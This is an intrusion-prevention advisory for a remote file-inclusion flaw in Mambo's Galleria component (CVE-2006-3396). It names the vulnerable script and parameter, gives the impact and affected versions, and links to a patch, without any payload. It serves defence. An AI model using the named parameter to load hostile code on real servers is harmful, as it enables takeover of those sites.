Intrusion Prevention

Mambo.Galleria.galleria.html.php.File.Inclusion

Description

Galleria has a remote file-include vulnerability. A remote attacker could execute an arbitrary script on the web server with the privileges of the server, via a specially-crafted URL request to the galleria.html.php script, by using the 'mosConfig_absolute_path' parameter to specify a malicious PHP file from a remote system.

Affected Products

Galleria version 1.0 and prior.

Impact

Gain Access

Recommended Actions

Apply patch :
http://forum.mamboserver.com/showthread.php?t=83001

CVE References

CVE-2006-3396